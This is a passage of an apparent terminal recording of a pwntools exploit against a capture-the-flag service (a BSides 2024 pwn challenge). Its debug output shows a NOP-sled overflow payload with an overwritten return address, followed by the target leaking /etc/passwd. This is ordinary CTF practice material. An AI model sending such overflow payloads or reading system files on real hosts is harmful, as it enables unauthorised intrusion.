[19.494033, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x32 bytes:\u001b[K\r\n"]
[19.494218, "o", "    b'\\n'\u001b[K\r\n"]
[19.494292, "o", "    b'Alright! Do you have any more questions? (y/n)\\n'\u001b[K\r\n"]
[19.494502, "o", "    b'> '\u001b[K\r\n"]
[19.494712, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x2 bytes:\u001b[K\r\n"]
[19.494869, "o", "    b'y\\n'\u001b[K\r\n"]
[19.506168, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x51 bytes:\u001b[K\r\n"]
[19.506335, "o", "    b'Enough questions for today class...\\n'\u001b[K\r\n"]
[19.506475, "o", "    b'Well, maybe a last one and then we finish!\\n'\u001b[K\r\n"]
[19.506614, "o", "    b'> '\u001b[K\r\n"]
[19.506826, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Sent 0x190 bytes:\u001b[K\r\n"]
[19.510848, "o", "    00000000  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n    *\u001b[K\r\n"]
[19.511071, "o", "    00000080  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m0c\u001b[m \u001b[34m09\u001b[m 40 \u001b[31m00\u001b[m  \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m \u001b[31m00\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m@\u001b[31mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[m\u001b[31mÂ·\u001b[mâ”‚\r\n"]
[19.511293, "o", "    00000090  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m \u001b[34m90\u001b[m  â”‚\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[mâ”‚\r\n    *\u001b[K\r\n    00000190\u001b[K\r\n"]
[19.511535, "o", "Receiving all data\u001b[K\r\n"]
[19.512028, "o", "\u001b[35;1H[\u001b[1m\u001b[34mâ†\u001b[m] Receiving all data\u001b[K\r\n\u001b[J"]
[19.512318, "o", "\u001b[35;5HReceiving all data: 0B\u001b[K\r\n\u001b[J"]
[19.533302, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x3a bytes:\u001b[K\r\n"]
[19.536021, "o", "    00000000  57 68 61 74  20 61 72 65  20 79 6f 75  20 64 6f 69  â”‚What\u001b[34mâ”‚\u001b[m are\u001b[34mâ”‚\u001b[m you\u001b[34mâ”‚\u001b[m doiâ”‚\r\n"]
[19.536093, "o", "    00000010  6e 67 20 68  65 72 65 3f  21 20 4b 69  64 73 20 61  â”‚ng h\u001b[34mâ”‚\u001b[mere?\u001b[34mâ”‚\u001b[m! Ki\u001b[34mâ”‚\u001b[mds aâ”‚\r\n"]
[19.536171, "o", "    00000020  72 65 20 6e  6f 74 20 61  6c 6c 6f 77  65 64 20 68  â”‚re n\u001b[34mâ”‚\u001b[mot a\u001b[34mâ”‚\u001b[mllow\u001b[34mâ”‚\u001b[med hâ”‚\r\n"]
[19.536451, "o", "    00000030  65 72 65 21  20 \u001b[34mf0\u001b[m \u001b[34m9f\u001b[m \u001b[34m94\u001b[m  \u001b[34m9e\u001b[m \u001b[31m0a\u001b[m                     â”‚ere!\u001b[34mâ”‚\u001b[m \u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mÂ·\u001b[m\u001b[34mâ”‚\u001b[m\u001b[34mÂ·\u001b[m\u001b[31mÂ·\u001b[mâ”‚\u001b[K\r\n    0000003a\u001b[K\r\n"]
[19.53654, "o", "\u001b[29;5HReceiving all data: 58B\u001b[K\r\n\u001b[36;1H\u001b[J"]
[19.537615, "o", "[\u001b[1m\u001b[31mDEBUG\u001b[m] Received 0x100 bytes:\u001b[K\r\n"]
[19.537847, "o", "    b'root:x:0:0:root:/root:/bin/bash\\n'\u001b[K\r\n"]
[19.538037, "o", "    b'daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\\n'\u001b[K\r\n"]
[19.538209, "o", "    b'bin:x:2:2:bin:/bin:/usr/sbin/nologin\\n'\u001b[K\r\n"]
[19.538388, "o", "    b'sys:x:3:3:sys:/dev:/usr/sbin/nologin\\n'\u001b[K\r\n"]
[19.538557, "o", "    b'sync:x:4:65534:sync:/bin:/bin/sync\\n'\u001b[K\r\n"]
[19.538739, "o", "    b'games:x:5:60:games:/usr/games:/usr/sbin/nologin\\n'\u001b[K\r\n"]
[19.538882, "o", "    b'man:x:6:12:man:/var'\u001b[K\r\n"]
[19.539101, "o", "\u001b[21;5HReceiving all data: 314B\u001b[K\r\n\u001b[36;1H\u001b[J"]
[19.539386, "o", "\u001b[21;5HReceiving all data: Done (314B)\u001b[K\r\n\u001b[36;1H\u001b[J"]
[19.539661, "o", "\u001b[21;1H[\u001b[1m\u001b[32m+\u001b[m] \u001b[36;1H\u001b[J"]
[19.539928, "o", "[\u001b[1m\u001b[34m*\u001b[m] Closed connection to 192.168.13.37 port 8000\u001b[K\r\n"]
[19.540656, "o", "/home/kidd/.local/lib/python3.11/site-packages/pwnlib/log.py:347: BytesWarning: Bytes is not text; assuming UTF-8, no guarantees. See https://docs.pwntools.com/#bytes\u001b[K\r\n"]
[19.540728, "o", "  self._log(logging.INFO, message, args, kwargs, 'success')\u001b[K\r\n"]
[19.541173, "o", "[\u001b[1m\u001b[32m+\u001b[m] What are you doing here?! Kids are not allowed here! ðŸ”ž\u001b[K\r\n    root:x:0:0:root:/root:/bin/bash\u001b[K\r\n"]
[19.541244, "o", "    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\u001b[K\r\n    bin:x:2:2:bin:/bin:/usr/sbin/nologin\u001b[K\r\n"]
[19.541316, "o", "    sys:x:3:3:sys:/dev:/usr/sbin/nologin\u001b[K\r\n    sync:x:4:65534:sync:/bin:/bin/sync\u001b[K\r\n"]
[19.541403, "o", "    games:x:5:60:games:/usr/games:/usr/sbin/nologin\u001b[K\r\n    man:x:6:12:man:/var\u001b[K\r\n"]
[19.542371, "o", "\u001b[?12l\u001b[?25h\u001b[?1l\u001b> \b"]
[19.635775, "o", "                                                                                       \r\r"]
[19.636006, "o", "\u001b]0;kidd@wildwest: ~/Desktop/WORK/bsides24/pwn\u0007\r\n"]
[19.662649, "o", "\r\u001b[0m\u001b[27m\u001b[24m\u001b[J\u001b[32mâ”Œâ”€â”€(\u001b[1m\u001b[32m\u001b[34mkiddã‰¿wildwest\u001b[0m\u001b[34m\u001b[32m)-[\u001b[1m\u001b[32m\u001b[39m~/Desktop/WORK/bsides24/pwn\u001b[0m\u001b[32m]\r\nâ””â”€\u001b[1m\u001b[32m\u001b[34m$\u001b[0m\u001b[34m\u001b[39m \u001b[K"]
[19.662902, "o", "\u001b[?1h\u001b="]
[19.663726, "o", "\u001b[?2004h"]
[22.849448, "o", "\u001b[1me\u001b[0m"]
[22.850258, "o", "\b\u001b[1me\u001b[0m\u001b[38;2;153;153;153mxit\u001b[39m\b\b\b"]
[22.939379, "o", "\b\u001b[0m\u001b[36me\u001b[36mx\u001b[39m"]
[23.064673, "o", "\b\b\u001b[39m\u001b[4me\u001b[39m\u001b[4mx\u001b[39m\u001b[4mi\u001b[24m"]
[23.246325, "o", "\b\b\b\u001b[24m\u001b[36me\u001b[24m\u001b[36mx\u001b[24m\u001b[36mi\u001b[36mt\u001b[39m"]
[27.324516, "o", "\u001b[?1l\u001b>"]
[27.326503, "o", "\u001b[?2004l\r\r\n"]
